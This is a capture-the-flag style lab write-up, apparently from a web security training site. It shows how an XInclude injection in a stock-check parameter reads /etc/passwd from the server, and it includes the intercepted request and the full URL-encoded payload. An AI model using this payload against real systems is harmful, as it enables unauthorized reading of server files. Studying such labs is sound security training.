Exploiting XInclude to retrieve files
Description
This lab has a "Check stock" feature that embeds the user input inside a server-side XML document that is subsequently parsed.
Because you don't control the entire XML document you can't define a DTD to launch a classic XXE attack.
To solve the lab, inject an XInclude statement to retrieve the contents of the /etc/passwd file.
Approach
Upon accessing the lab, I immediately targeted the POST /product/stock request to explore potential XXE vulnerabilities. However, I noticed that the Content-Type appeared to be different from the usual XML format:
POST /product/stock HTTP/2
Host: 0ac70000048624d6808f9e620065007b.web-security-academy.net
Cookie: session=4DgmiUxtO96sSAye9qcONWYBxy5o7i9h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
...
productId=1&storeId=1To confirm if my input data was being embedded in an XML document, I attempted to reference an entity called ichyaboy:
productId=%26ichyaboy;&storeId=1Encountering the error message "Entities are not allowed for security reasons" confirmed that my input was being parsed as XML.
"Entities are not allowed for security reasons"Given that I didn't control the entire XML document and couldn't define or modify a DOCTYPE element, I turned to XInclude, which allows including content from another XML document. In my case, I aimed to reference the /etc/passwd file. Here's the payload I crafted:
productId=<ichyaboy+xmlns%3axi%3d"http%3a//www.w3.org/2001/XInclude">
<xi%3ainclude+parse%3d"text"+href%3d"file%3a///etc/passwd"/></ichyaboy>&storeId=1In this payload, the line "xmlns:xi="http://www.w3.org/2001/XInclude"" defines a namespace prefix for XInclude. The subsequent part is an XInclude element (xi:include) that references an external file (file:///etc/passwd).
Upon sending this payload, I observed the content of the /etc/passwd file in the response, thereby successfully solving the lab.